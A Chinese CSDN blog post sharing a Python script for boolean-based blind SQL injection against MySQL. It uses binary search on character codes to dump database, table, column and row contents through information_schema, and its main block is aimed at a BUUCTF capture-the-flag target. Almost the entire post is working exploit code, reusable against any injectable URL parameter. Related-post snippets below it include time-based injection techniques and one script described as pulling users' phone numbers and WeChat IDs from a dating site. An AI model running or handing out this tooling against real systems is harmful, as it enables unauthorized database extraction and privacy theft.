mysql盲注二分法脚本

最新推荐文章于 2024-04-28 15:36:38 发布
最新推荐文章于 2024-04-28 15:36:38 发布
阅读量439 收藏
点赞数 2
分类专栏: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zh_cn1/article/details/119648898
版权
本文介绍了一个使用Python编写的SQL盲注脚本,通过布尔盲注技术探测数据库信息,包括数据库长度、数据库数量、表数量、列数量以及数据内容。脚本利用了information_schema系统表来获取数据库结构,并通过ASCII比较来确定字符。虽然最终作者认为sqlmap更为高效,但该脚本展示了手动SQL注入探测的基础原理。
摘要由CSDN通过智能技术生成

PS
闲得蛋疼,写了个盲注的脚本,最后发现还是sqlmap香

import requests
#布尔盲注mysql脚本



#正常页面的大小
def resLen(url):
	res=requests.get(url)
	return len(res.text)

#当前数据库长度
def currdb_len(url):
	payload="1' and length(database())="
	for i in range(1,100):
		if resLen(url+payload+str(i)+" --+") == resLen(url):
			print("当前数据库长度为: ",i)
			break
	return i

#数据库数量
def db_count(url,reslen):
	payload="1' and (select count(schema_name) from information_schema.schemata)="
	for i in range(1,100):
		if resLen(url+payload+str(i)+" --+") == reslen:
			print("共有%d个数据库"%i)
			break
	return i

#数据库长度
def db_len(url,count,reslen):
	db=[]
	for i in range(0,count):
		for j in range(1,100):
			payload="1' and (select length(schema_name) from information_schema.schemata limit "+str(i)+",1)="
			if resLen(url+payload+str(j)+" --+") == reslen:
				print("第%d个数据库的长度为%d:"%(i+1,j))
				db.append(j)
				break
	return db

#获取全部数据库名字
def db_name(url,db,reslen):
	dbname = []
	for i in db:
		name=""
		for j in range(1,i+1):
			start = 32
			end = 127
			while(start <= end):
				mid=int((start+end)/2)
				payload="1' and ascii(substr((select schema_name from information_schema.schemata limit {0},1),{1},1)) > {2} --+".format(db.index(i),j,mid)
				payload1="1' and ascii(substr((select schema_name from information_schema.schemata limit {0},1),{1},1)) = {2} --+".format(db.index(i),j,mid)
				if resLen(url+payload ) == reslen:
						start = mid
				if resLen(url+payload) != reslen:
					if resLen(url+payload1) == reslen:
						name+=chr(mid)
						print(name)
						break
					else:
						end = mid

		dbname.append(name)
	return dbname

#-----------------------------------------------------------------------------------------------------------------------------

#获取表个数和长度
def table_len(url,dbname,reslen):
	table=[]
	for i in range(1,100):
		payload="1' and (select count(table_name) from information_schema.tables where table_schema='{0}')={1} --+".format(dbname,i)
		if resLen(url+payload) == reslen:
			print("{0}数据库的表有{1}个".format(dbname,i))
			break

	for n in range(0,i):
		for j in range(1,100):
			payload1="1' and (select length(table_name) from information_schema.tables where table_schema='{0}' limit {1},1)={2} --+".format(dbname,n,j)
			if resLen(url+payload1) == reslen:
				print(url+payload1)
				table.append(j)
				break
	return table

##获取表名
def table_name(url,dbname,table,reslen):
	tablename=[]
	for i in range(0,len(table)):
		name=""
		for j in range(1,table[i]+1):
			start = 32
			end = 127
			while(start <= end):
				mid=int((start+end)/2)
				payload="1' and ascii(substr((select table_name from information_schema.tables where table_schema='{0}' limit {1},1),{2},1)) > {3} --+".format(dbname,i,j,mid)
				payload1="1' and ascii(substr((select table_name from information_schema.tables where table_schema='{0}' limit {1},1),{2},1)) = {3} --+".format(dbname,i,j,mid)
				#print("-----------------")
				#print(url+payload)
				if resLen(url+payload ) == reslen:
					start = mid
				if resLen(url+payload) != reslen:
					if resLen(url+payload1) == reslen:
						name+=chr(mid)
						print(name)
						break
					else:
						end = mid

		tablename.append(name)
	return tablename

#--------------------------------------------------------------------------

#获取列数和长度
def column_len(url,tablename,reslen):
	column=[]
	for i in range(1,100):
		payload="1' and (select count(column_name) from information_schema.columns where table_name='{0}')={1} --+".format(tablename,i)
		if resLen(url+payload) == reslen:
			print("数据表{0}中的列有{1}个".format(tablename,i))
			break

	for n in range(0,i):
		for j in range(1,100):
			payload1="1' and (select length(column_name) from information_schema.columns where table_name='{0}' limit {1},1)={2} --+".format(tablename,n,j)
			if resLen(url+payload1) == reslen:
				print(url+payload1)
				column.append(j)
				break
	return column

##获取列名
def column_name(url,tablename,column,reslen):
	columnname=[]
	for i in range(0,len(column)):
		name=""
		for j in range(1,column[i]+1):
			start = 32
			end = 127
			while(start <= end):
				mid=int((start+end)/2)
				payload="1' and ascii(substr((select column_name from information_schema.columns where table_name='{0}' limit {1},1),{2},1)) > {3} --+".format(tablename,i,j,mid)
				payload1="1' and ascii(substr((select column_name from information_schema.columns where table_name='{0}' limit {1},1),{2},1)) = {3} --+".format(tablename,i,j,mid)
				#print(url+payload)
				if resLen(url+payload ) == reslen:
					start = mid
				if resLen(url+payload) != reslen:
					if resLen(url+payload1) == reslen:
						name+=chr(mid)
						print(name)
						break
					else:
						end = mid

		columnname.append(name)
	return columnname

##获取数据长度
def data_len(url,columnname,dbname,tablename,reslen):
	data=[]
	for i in range(1,100):
		payload="1' and (select count({0}) from {1}.{2} )={3} --+".format(columnname,dbname,tablename,i)
		#print(url+payload)
		if resLen(url+payload) == reslen:
			print("数据列{0}中的数据有{1}行".format(columnname,i))
			break

	for n in range(0,i):
		for j in range(1,100):
			payload1="1' and (select length({0}) from {1}.{2} limit {3},1)={4} --+".format(columnname,dbname,tablename,n,j)
			if resLen(url+payload1) == reslen:
				print(url+payload1)
				data.append(j)
				break
	return data

##获取数据内容
def data_value(url,columnname,dbname,tablename,data,reslen):
	datavalue=[]
	for i in range(0,len(data)):
		name=""
		for j in range(1,data[i]+1):
			start = 32
			end = 127
			while(start <= end):
				mid=int((start+end)/2)
				payload="1' and ascii(substr((select {0} from {1}.{2} limit {3},1),{4},1)) > {5} --+".format(columnname,dbname,tablename,i,j,mid)
				payload1="1' and ascii(substr((select {0} from {1}.{2} limit {3},1),{4},1)) = {5} --+".format(columnname,dbname,tablename,i,j,mid)
				#print(url+payload)
				if resLen(url+payload ) == reslen:
					start = mid
				if resLen(url+payload) != reslen:
					if resLen(url+payload1) == reslen:
						name+=chr(mid)
						print(name)
						break
					else:
						end = mid

		datavalue.append(name)
	return datavalue




if __name__ == "__main__":
	
	url="http://70fb105f-c8ca-4166-b991-610732d01442.node4.buuoj.cn:81?id="
	reslen=resLen(url)
	

	'''
	count =db_count(url,reslen)
	db=db_len(url,count,reslen)
	dbname=db_name(url,db,reslen)
	'''
	#table=table_len(url,"note",reslen)
	#tablename=table_name(url,"note",table,reslen) #fl4g,note
	
	#column=column_len(url,"fl4g",reslen)
	#columnname = column_name(url,"fl4g",column,reslen)
	data=data_len(url,'fllllag','note','fl4g',reslen)
	print(data)
	datavalue=data_value(url,'fllllag','note','fl4g',data,reslen)
	print(datavalue)
本宝宝不开心
关注
专栏目录
时间盲注python脚本(二分查找优化)支持cookie注入
qq_36915061的博客
12-02 952
时间盲注python脚本(二分查找优化)支持cookie注入 菜鸟自用,仅供参考 使用说明 可根据用途更改payload中的select语句,字符型注入点有两种注入情况: 1、最后添加注释符 2、最后的字符添加单引号,与原语句中的单引号闭合 get_length和get_name可结合使用 可根据自己的猜解范围调整min和max import requests import dat...
mysql时间盲注if的绕过_MySQL时间盲注五种延时方法 (PWNHUB 非预期解)
weixin_42382703的博客
01-19 948
PWNHUB 一道盲注题过滤了常规的sleep和benchmark函数,引发对时间盲注中延时方法的思考。延时函数SLEEPmysql> select sleep(5);+----------+| sleep(5) |+----------+| 0 |+----------+1 row in set (5.00 sec)BENCHMARKmysql> select benc...
二分法盲注
qq_43756333的博客
05-25 2971
在学sql盲注脚本的时候碰到了使用二分法盲注字段的情况,学习一下。 环境: [CISCN2019 华北赛区 Day2 Web1]Hack World 复现地址:BUUCTF 打开题目 直接告诉了flag在flag表和flag列里,让我们提交id。 这道题过滤了一些字段以及常用注入语句,可以用Burpsuite来fuzz测试一下,如下所示,长度为482的代表被过滤 最后使用的方法是异或注入,有关异或注入的原理,可参考异或注入 直接给出payload:1^(if((ascii(substr((select
mysql order by布尔盲注
CvtNhso的博客
02-26 388
MySQL支持使用ORDER BY语句对查询结果集进行排序处理,使用ORDER BY语句不仅支持对单列数据的排序,还支持对数据表中多列数据的排序。语法格式如下select * from 表名 order by 列名(或者数字) asc;升序(默认升序)select * from 表名 order by 列名(或者数字) desc;降序使用sqli-labs-php7-master环境在第46关查看源码及打开网页源代码color:#FFF;php?
【Python】面向Sqli-Labs Less15的布尔盲注二分法脚本
RexHa的博客
11-18 1796
python实现sqli-labs第15关post盲注二分法注入脚本(基于布尔盲注
SQL盲注脚本MySQL
卧龙居
11-13 1313
#coding:utf-8 import urllib.request import json """ SQL盲注脚本,适用于MYSQL数据库;CTF 0~1 SQL注入第二题 """ class SqlBlindInjection(object): def __init__(self): self.url = "http://eci-2zej1goyn9jgugq1cnzn.cloudeci1.ichunqiu.com/login.php" #条件为真的返回值.
数学二分法解方程vbs脚本――超简单的
einlb60q
01-16 758
数学二分法解方程vbs脚本――超简单的 2009年10月31日    [b]vbs使用方法~~~[/b]   [b] 新建文本文档,把下面我编写下的脚本输进去,退出,保存。重命名把扩展名改为.vbs如“二分法.vbs”(没“”)下面是脚本,使用起来可能比较麻烦点,见谅~!![/b][b]   Dim x1, x2, y1, y2, a, b, c, d, e ,aa,bb,dd ...
PHP正则表达式二分法实现mysql盲注脚本
weixin_30348519的博客
04-29 134
$sUrl = 'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx'; $sPost = 'inject=Inject&injection='; $sCharset = 'ABCDEF0123456789'; /* for every character */ for ($i=0, $hash=''; $i<32; ++$i) { ...
mysql延迟_MySQL时间盲注五种延时方法 (PWNHUB 非预期解)
weixin_35972981的博客
01-18 869
转自cdxy师傅:https://www.cdxy.me/?p=789PWNHUB 一道盲注题过滤了常规的sleep和benchmark函数,引发对时间盲注中延时方法的思考。延时函数SLEEPmysql> select sleep(5);+----------+| sleep(5) |+----------+| 0 |+----------+1 row in set (5.00...
mysql基于时间盲注_MySQL基于时间盲注(Time-Based Blind SQL Injection)五种延时方法...
weixin_42527178的博客
01-19 965
PWNHUB 一道盲注题过滤了常规的sleep和benchmark函数,引发对时间盲注中延时方法的思考。延时函数SLEEPmysql> select sleep(5);+----------+| sleep(5) |+----------+| 0 |+----------+1 row in set (5.00 sec)BENCHMARKmysql> select benc...
DVWA-SQL盲注脚本(全)
10-04
DVWA SQL盲注,Low,Medium,High 三个级别的bool盲注脚本,比较完整,配套解释 : https://blog.csdn.net/csdn_Pade/article/details/82886765
sqli-labs盲注脚本
06-24
sqli-labs盲注脚本 sqli-labs盲注脚本 sqli-labs盲注脚本
sql盲注
qq_40648358的博客
02-25 581
文章目录SQL盲注README万能密码原理常用函数 or 方法substr()函数left()函数mid()函数ascii()函数和ord()函数regexp正则注入like匹配注入比大小的方法concat()函数盲注利用布尔盲注时间盲注 SQL盲注 README 乌市素质单男|复读机 基于MYSQL5.0 用于演示的数据库为sqli-labs配套的security数据库的user表 mysq...
时间盲注SQL注入
SheXinK’s Blog
12-18 528
时间盲注SQL注入1、 SQL注入介绍2、 报错注入注入PHP代码3、 时间注入测试4、 SQL注入防御 1、 SQL注入介绍   SQL注入介绍:SQL注入介绍   注入产生原因:web应用程序对用户输入数据的合法性没有判断或过滤不严,导致恶意payload直接带入SQL语句执行,从而执行payload中非法操作! 2、 报错注入注入PHP代码   新建PHP文件,将下面代码复制到PHP文件中,...
sql盲注二分法注入脚本
菜鸟-传奇
12-27 1039
sql盲注二分法注入脚本脚本可以用来检测sql靶场第五关 http://caichuanqi.cn/lab/sqli-labs-master/Less-5/?id=1 #-*-coding:utf-8-*- import requests import time #host = "http://web.jarvisoj.com:32787/login.php" host = "http:...
python mysql盲注脚本
夜班机器人的博客
07-26 2535
某相亲网漏洞,可盲注获得手机号和微信号。 功能1:爬取所有女性ID、年龄、月薪、照片URL 功能2:通过盲注方式获取对应ID的手机号和微信号 功能3:所有数据自动导入MYSQL 缺点:单线程
过滤逗号的二分查找+多线程sql盲注脚本
ruyueattention
09-19 838
前言 之前在做渗透测试时,sqlmap跑出一个单引号闭合的sql注入,但当我想爆库、爆表时,不知道后台做了什么限制,sqlmap始终无法跑出来 提示:以下是本篇文章正文内容,下面案例可供参考 一、pandas是什么? 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 二、使用步骤 1.引入库 代码如下(示例): import numpy as np import pandas as pd import matplotlib.pyplot as plt import
python脚本实现布尔盲注
最新发布
求大佬师傅带
04-28 914
相信师傅们在平常渗透测试中,偶尔会遇到布尔盲注的情况,但是手工的话太慢,上sqlmap流量又太大,特征太明显。所以用python脚本就是最优解,可以自定义user-agent等字段,注入速度等。
mysql基于bool盲注,基于布尔盲注脚本编写实例
weixin_39864261的博客
03-18 154
一个基于布尔盲注脚本编写实例前置知识判断user长度-1 OR if((length(user())=14),1,0)查user()-1 OR if(ascii(substr(user(),1,1))=114,1,0)查database()-1 OR if(ascii(substr(database(),1,1))=114,1,0)查version()-1 OR if(ascii(substr(...
通达OA SQL盲注利用:多线程+二分法提升效率
"这篇文档主要介绍了如何利用多线程和二分法来提高SQL盲注的效率,通过在Poc脚本中应用这些技术,针对通达OA系统2017版本的一个SQL注入漏洞进行利用,以获取管理员的sessionid并登陆后台。文章强调了使用者对由此...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值